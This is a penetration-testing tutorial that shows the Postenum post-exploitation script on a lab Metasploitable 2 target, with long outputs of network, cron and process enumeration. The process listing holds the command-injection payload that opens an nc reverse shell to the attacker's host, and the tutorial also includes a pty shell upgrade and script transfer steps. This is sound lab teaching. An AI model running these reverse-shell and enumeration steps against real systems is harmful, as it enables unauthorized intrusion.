Post-exploitation is often not quite as exciting as popping the initial shell, but it's a crucial phase for gathering data and further privilege escalation. Once a target is compromised, there's a lot of information to find and sift through. Luckily, there are tools available that can make the process easy. One such tool is Postenum.
To show everything Postenum has to offer for post-exploitation, we're using Kali Linux as our local machine. As for the target, if you want to follow along and try the tool out as a white hat or penetration tester, Metasploitable 2 is a good intentionally vulnerable virtual machine to use.
Phase 1: Initial Compromise
Before we can use Postenum, we must first exploit the target and get a shell. We can use command injection to run operating system commands on the server and abuse its functionality to get a reverse shell.
We'll also want to upgrade our new shell to a fully interactive one. That will make it easier to work in general and will also let us use tab completion and terminal history. And we'll assume the target has limited connectivity to the internet, so we'll need to find a way to transfer Postenum from our local machine.
First, grab the script from GitHub with the wget command:
~# wget https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
--2020-06-18 16:14:29-- https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56110 (55K) [text/plain]
Saving to: ‘postenum.sh’
postenum.sh 100%[======================>] 54.79K --.-KB/s in 0.07s
2020-06-18 16:14:29 (749 KB/s) - ‘postenum.sh’ saved [56110/56110]
Next, we can start a simple server using Python to serve the file over HTTP:
~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Back on the target system, let's move to a writable directory so we can download and run our script:
target:/var/vulnerabilities/exec$ cd /var/tmp/
target:/var/tmp$
Grab the file we are hosting on our machine, taking care to use the appropriate IP address:
target:/var/tmp$ wget http://10.10.0.1:8000/postenum.sh
--16:16:24-- http://10.10.0.1:8000/postenum.sh
=> `postenum.sh'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43,831 (43K) [text/x-sh]
100%[=================================================================================================================================================================================================>] 43,831 --.--K/s
16:16:24 (53.19 MB/s) - `postenum.sh' saved [43831/43831]
We should see the request where our server is running if everything was successful:
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [18/Jun/2020 10:49:36] "GET /postenum.sh HTTP/1.0" 200 -
And we can kill this now that we have transferred the script. Then, if we list the contents of the directory, we'll see that the script isn't executable yet:
target:/var/tmp$ ls -la
total 52
drwxrwxrwt 2 root root 4096 Jun 16 13:35 .
drwxr-xr-x 14 root root 4096 Mar 17 2010 ..
-rw-r--r-- 1 www-data www-data 43831 Jun 18 2020 postenum.sh
Use the chmod command to make it executable:
target:/var/tmp$ chmod +x postenum.sh
And we should see that it's now able to execute:
target:/var/tmp$ ls -la
total 52
drwxrwxrwt 2 root root 4096 Jun 16 13:35 .
drwxr-xr-x 14 root root 4096 Mar 17 2010 ..
-rw-r--r-- 1 www-data www-data 43831 Jun 18 2020 postenum.sh
To run it, simply use the dot-slash for Bash scripts:
target:/var/tmp$ ./postenum.sh
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
Usage > ./postenum.sh <option>
Options >
-a : All
-s : Filesystem [SUID, SGID, Config/DB files, etc.]
-l : Shell escape and development tools
-c : The most interesting files
-n : Network settings
-p : Services and cron jobs
-o : OS informations and priv esc exploits
-v : Sofware's versions
-t : Fstab credentials and databases checker
That will give us a nice little banner and some usage options.
Phase 2: Network Settings
The first option we'll cover will gather networking information and settings. Use the -n switch to kick it off:
target:/var/tmp$ ./postenum.sh -n
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] COMMUNICATING and NETWORKING
[+] - Check NIC(s) does the system have
[x] Available network interfaces on the system:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet static
address 10.10.0.50
netmask 255.255.255.0
gateway 10.10.0.1
[x] Hosts:
127.0.0.1 localhost
127.0.1.1 target.localdomain target
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
[+] - Check network configuration settings
[x] DNS name servers:
search localdomain
nameserver 172.16.1.1
[x] Networks:
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
[x] hostname:
target
[x] Get DNS domain or the FQDN:
localdomain
[+] - Check users and hosts communicating with the system
[x] Display all TCP/UDP connected socket, PID/program:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:41801 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:47536 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 10.10.0.50:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:44182 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:51902 0.0.0.0:* LISTEN -
tcp 0 0 10.10.0.50:34846 10.10.0.1:1234 ESTABLISHED 4789/bash
tcp6 0 0 :::2121 :::* LISTEN -
tcp6 0 0 :::3632 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN -
tcp6 0 0 ::1:953 :::* LISTEN -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 10.10.0.50:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.0.50:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 127.0.0.1:47783 127.0.0.1:47783 ESTABLISHED -
udp 0 0 0.0.0.0:36136 0.0.0.0:* -
udp 0 0 0.0.0.0:945 0.0.0.0:* -
udp 0 0 10.10.0.50:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:52929 0.0.0.0:* -
udp 0 0 0.0.0.0:69 0.0.0.0:* -
udp 0 0 0.0.0.0:40927 0.0.0.0:* -
udp 0 0 0.0.0.0:55275 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp6 0 0 :::53 :::* -
udp6 0 0 :::50653 :::* -
[x] List files based on their Internet address:
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 4789 www-data 0u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash 4789 www-data 1u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python 4797 www-data 0u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python 4797 www-data 1u IPv4 12807 TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
[x] Last logged in users:
root pts/0 :0.0 Wed Jun 17 13:22 still logged in
reboot system boot 2.6.24-16-server Wed Jun 17 13:21 - 13:43 (00:21)
msfadmin tty1 Wed Jun 17 15:40 - down (00:00)
msfadmin tty1 Wed Jun 17 15:40 - 15:40 (00:00)
wtmp begins Wed Jun 18 15:38:50 2020
[x] Who is logged on and what they are doing:
13:43:00 up 22 min, 1 user, load average: 0.02, 0.04, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :0.0 13:22 21:03m 0.05s 0.05s -bash
[+] - Check cached IP and/or MAC addresses
We can see it gives us a bunch of information, starting with available network interfaces and hostnames and addresses. It then shows us some DNS information and any symbolic names for the network. Finally, it shows us the hosts and users communicating with the system, followed by logged in users and relevant information.
Phase 3: Services & Cron Jobs
The next option we'll look at will discover running services and any cron jobs that are present on the system. Use the -p switch for this:
target:/var/tmp$ ./postenum.sh -p
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x 2 root root 4096 Jul 5 2018 cron.d
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.daily
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.hourly
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.monthly
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.weekly
-rw-r--r-- 1 root root 724 Apr 8 2008 crontab
[x] List /etc/cron.d/
-rw-r--r-- 1 root root 507 May 3 2012 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-common
[x] Root's cron jobs:
no crontab for www-data
[x] The content of /etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
[x] View daily cron jobs:
-rwxr-xr-x 1 root root 633 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22 2008 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Jun 17 2006 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Apr 28 2010 samba
-rwxr-xr-x 1 root root 3295 Apr 8 2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 477 Dec 7 2008 tomcat55
[x] View monthly cron jobs:
-rwxr-xr-x 1 root root 664 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 129 Apr 8 2008 standard
[x] View weekly cron jobs:
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd
[+] - Check for running services, and which service(s) are been running by root
[x] Display every process on the system:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 0.6 2844 1696 ? Ss 13:20 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 13:20 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 13:20 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 13:20 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 13:20 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 13:20 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 13:20 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 13:20 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpi_notify]
root 88 0.0 0.0 0 0 ? S< 13:20 0:00 [kseriod]
root 125 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 126 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 127 0.0 0.0 0 0 ? S< 13:20 0:00 [kswapd0]
root 169 0.0 0.0 0 0 ? S< 13:20 0:00 [aio/0]
root 1125 0.0 0.0 0 0 ? S< 13:20 0:00 [ksnapd]
root 1316 0.0 0.0 0 0 ? S< 13:20 0:00 [ata/0]
root 1318 0.0 0.0 0 0 ? S< 13:20 0:00 [ata_aux]
root 1327 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_0]
root 1340 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_1]
root 1345 0.0 0.0 0 0 ? S< 13:20 0:00 [ksuspend_usbd]
root 1353 0.0 0.0 0 0 ? S< 13:20 0:00 [khubd]
root 1771 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_2]
root 2295 0.0 0.0 0 0 ? S< 13:20 0:00 [kjournald]
root 2460 0.0 0.2 2216 652 ? S<s 13:20 0:01 /sbin/udevd --daemon
root 2706 0.0 0.0 0 0 ? S< 13:20 0:00 [kpsmoused]
root 3588 0.0 0.0 0 0 ? S< 13:21 0:00 [kjournald]
daemon 3717 0.0 0.2 1836 524 ? Ss 13:21 0:00 /sbin/portmap
statd 3737 0.0 0.2 1900 728 ? Ss 13:21 0:00 /sbin/rpc.statd
root 3743 0.0 0.0 0 0 ? S< 13:21 0:00 [rpciod/0]
root 3758 0.0 0.2 3648 564 ? Ss 13:21 0:00 /usr/sbin/rpc.idmapd
root 3985 0.0 0.1 1716 488 tty4 Ss+ 13:21 0:00 /sbin/getty 38400 tty4
root 3986 0.0 0.1 1716 492 tty5 Ss+ 13:21 0:00 /sbin/getty 38400 tty5
root 3990 0.0 0.1 1716 488 tty2 Ss+ 13:21 0:00 /sbin/getty 38400 tty2
root 3993 0.0 0.1 1716 492 tty3 Ss+ 13:21 0:00 /sbin/getty 38400 tty3
root 3996 0.0 0.1 1716 488 tty6 Ss+ 13:21 0:00 /sbin/getty 38400 tty6
syslog 4034 0.0 0.2 1936 648 ? Ss 13:21 0:00 /sbin/syslogd -u syslog
root 4069 0.0 0.2 1872 540 ? S 13:21 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog 4071 0.0 0.8 3152 2052 ? Ss 13:21 0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind 4094 0.0 3.0 35408 7676 ? Ssl 13:21 0:00 /usr/sbin/named -u bind
root 4116 0.0 0.3 5312 996 ? Ss 13:21 0:00 /usr/sbin/sshd
root 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4235 0.1 6.6 127560 17036 ? Sl 13:21 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 4236 0.0 0.2 1700 556 ? S 13:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres 4323 0.1 1.9 41340 5068 ? S 13:21 0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres 4326 0.2 0.5 41340 1376 ? Ss 13:21 0:03 postgres: writer process
postgres 4327 0.2 0.4 41340 1188 ? Ss 13:21 0:03 postgres: wal writer process
postgres 4328 0.0 0.5 41476 1432 ? Ss 13:21 0:01 postgres: autovacuum launcher process
postgres 4329 0.0 0.4 12660 1172 ? Ss 13:21 0:00 postgres: stats collector process
daemon 4349 0.0 0.1 2316 424 ? SNs 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 4350 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 4399 0.0 0.0 0 0 ? S 13:21 0:00 [lockd]
root 4400 0.0 0.0 0 0 ? S< 13:21 0:00 [nfsd4]
root 4401 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4402 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4403 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4404 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4405 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4406 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4407 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4408 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4412 0.0 0.1 2424 332 ? Ss 13:21 0:00 /usr/sbin/rpc.mountd
daemon 4437 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon 4479 0.0 0.0 2316 216 ? SN 13:21 0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root 4480 0.0 0.6 5412 1728 ? Ss 13:21 0:00 /usr/lib/postfix/master
postfix 4484 0.0 0.6 5420 1644 ? S 13:21 0:00 pickup -l -t fifo -u -c
postfix 4485 0.0 0.6 5460 1688 ? S 13:21 0:00 qmgr -l -t fifo -u
root 4487 0.0 0.4 5388 1204 ? Ss 13:21 0:00 /usr/sbin/nmbd -D
root 4489 0.0 0.5 7724 1364 ? Ss 13:21 0:00 /usr/sbin/smbd -D
root 4493 0.0 0.3 7724 812 ? S 13:21 0:00 /usr/sbin/smbd -D
root 4508 0.0 0.3 2424 856 ? Ss 13:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd 4545 0.0 0.6 9948 1592 ? Ss 13:21 0:00 proftpd: (accepting connections)
daemon 4559 0.0 0.1 1984 424 ? Ss 13:21 0:00 /usr/sbin/atd
root 4570 0.0 0.3 2104 896 ? Ss 13:21 0:00 /usr/sbin/cron
root 4598 0.0 0.1 2052 348 ? Ss 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4599 0.0 0.1 2052 476 ? S 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55 4601 5.3 44.8 389632 114652 ? Sl 13:21 1:12 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4619 0.0 1.0 10596 2564 ? Ss 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4621 0.0 0.9 10728 2516 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4624 0.0 0.9 10728 2492 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4626 0.0 0.8 10596 2096 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4628 0.0 0.9 10596 2436 ? S 13:21 0:00 /usr/sbin/apache2 -k start
www-data 4629 0.0 0.9 10728 2500 ? S 13:21 0:00 /usr/sbin/apache2 -k start
root 4638 0.0 10.3 66344 26472 ? Sl 13:21 0:00 /usr/bin/rmiregistry
root 4642 0.5 1.0 12208 2568 ? Sl 13:21 0:08 ruby /usr/sbin/druby_timeserver.rb
root 4649 0.0 0.1 1716 488 tty1 Ss+ 13:21 0:00 /sbin/getty 38400 tty1
root 4657 0.0 0.9 8540 2372 ? S 13:21 0:01 /usr/bin/unrealircd
root 4659 0.3 4.7 14036 12016 ? S 13:21 0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root 4664 0.0 0.4 2724 1188 ? S 13:21 0:00 /bin/sh /root/.vnc/xstartup
root 4667 0.0 1.0 5936 2572 ? S 13:21 0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 4670 0.3 1.9 8988 5000 ? S 13:21 0:05 fluxbox
root 4704 0.0 0.6 2852 1544 pts/0 Ss+ 13:22 0:00 -bash
www-data 4759 0.0 0.7 10596 1956 ? S 13:23 0:00 /usr/sbin/apache2 -k start
www-data 4780 0.0 0.7 10596 1956 ? S 13:29 0:00 /usr/sbin/apache2 -k start
www-data 4787 0.0 0.5 3248 1460 ? S 13:29 0:00 sh -c ping -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
www-data 4789 0.0 0.5 3248 1448 ? S 13:29 0:00 bash
www-data 4797 0.0 0.9 3960 2472 ? S 13:31 0:00 python -c import pty;pty.spawn("/bin/bash")
www-data 4798 0.0 0.7 3400 1868 pts/1 Ss 13:31 0:00 /bin/bash
www-data 4927 0.0 0.7 3644 1888 pts/1 S+ 13:44 0:00 /bin/bash ./postenum.sh -p
www-data 4956 0.0 0.4 3616 1204 pts/1 S+ 13:44 0:00 /bin/bash ./postenum.sh -p
www-data 4957 0.0 0.3 2364 932 pts/1 R+ 13:44 0:00 ps aux
[x] Process binaries and permissions:
692K -rwxr-xr-x 1 root root 686K Apr 14 2008 /bin/bash
48K -rwxr-xr-x 1 root root 48K Apr 4 2008 /bin/dd
0 lrwxrwxrwx 1 root root 4 Apr 28 2010 /bin/sh -> bash
16K -rwxr-xr-x 1 root root 15K Apr 14 2008 /sbin/getty
92K -rwxr-xr-x 1 root root 88K Apr 11 2008 /sbin/init
24K -rwxr-xr-x 1 root root 23K Nov 23 2007 /sbin/klogd
16K -rwxr-xr-x 1 root root 15K Dec 3 2007 /sbin/portmap
40K -rwxr-xr-x 1 root root 39K Dec 2 2008 /sbin/rpc.statd
32K -rwxr-xr-x 1 root root 32K Nov 23 2007 /sbin/syslogd
72K -rwxr-xr-x 1 root root 67K Apr 11 2008 /sbin/udevd
32K -rwxr-xr-x 1 root root 31K May 21 2007 /usr/bin/jsvc
0 lrwxrwxrwx 1 root root 29 Apr 28 2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20 2012 /usr/bin/unrealircd
28K -rwxr-xr-x 1 root root 28K Apr 18 2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21 2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar 9 2010 /usr/sbin/apache2
16K -rwxr-xr-x 1 root root 16K Feb 20 2007 /usr/sbin/atd
32K -rwxr-xr-x 1 root root 31K Apr 8 2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28 2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr 9 2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28 2010 /usr/sbin/nmbd
36K -rwxr-xr-x 1 root root 35K Dec 2 2008 /usr/sbin/rpc.idmapd
76K -rwxr-xr-x 1 root root 72K Dec 2 2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28 2010 /usr/sbin/smbd
368K -rwxr-xr-x 1 root root 363K Apr 6 2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec 3 2007 /usr/sbin/xinetd
[x] Display every process running by root on the system:
root 1 0.1 0.6 2844 1696 ? Ss 13:20 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 13:20 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 13:20 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 13:20 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 13:20 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 13:20 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 13:20 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 13:20 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 13:20 0:00 [kacpi_notify]
root 88 0.0 0.0 0 0 ? S< 13:20 0:00 [kseriod]
root 125 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 126 0.0 0.0 0 0 ? S 13:20 0:00 [pdflush]
root 127 0.0 0.0 0 0 ? S< 13:20 0:00 [kswapd0]
root 169 0.0 0.0 0 0 ? S< 13:20 0:00 [aio/0]
root 1125 0.0 0.0 0 0 ? S< 13:20 0:00 [ksnapd]
root 1316 0.0 0.0 0 0 ? S< 13:20 0:00 [ata/0]
root 1318 0.0 0.0 0 0 ? S< 13:20 0:00 [ata_aux]
root 1327 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_0]
root 1340 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_1]
root 1345 0.0 0.0 0 0 ? S< 13:20 0:00 [ksuspend_usbd]
root 1353 0.0 0.0 0 0 ? S< 13:20 0:00 [khubd]
root 1771 0.0 0.0 0 0 ? S< 13:20 0:00 [scsi_eh_2]
root 2295 0.0 0.0 0 0 ? S< 13:20 0:00 [kjournald]
root 2460 0.0 0.2 2216 652 ? S<s 13:20 0:01 /sbin/udevd --daemon
root 2706 0.0 0.0 0 0 ? S< 13:20 0:00 [kpsmoused]
root 3588 0.0 0.0 0 0 ? S< 13:21 0:00 [kjournald]
root 3743 0.0 0.0 0 0 ? S< 13:21 0:00 [rpciod/0]
root 3758 0.0 0.2 3648 564 ? Ss 13:21 0:00 /usr/sbin/rpc.idmapd
root 3985 0.0 0.1 1716 488 tty4 Ss+ 13:21 0:00 /sbin/getty 38400 tty4
root 3986 0.0 0.1 1716 492 tty5 Ss+ 13:21 0:00 /sbin/getty 38400 tty5
root 3990 0.0 0.1 1716 488 tty2 Ss+ 13:21 0:00 /sbin/getty 38400 tty2
root 3993 0.0 0.1 1716 492 tty3 Ss+ 13:21 0:00 /sbin/getty 38400 tty3
root 3996 0.0 0.1 1716 488 tty6 Ss+ 13:21 0:00 /sbin/getty 38400 tty6
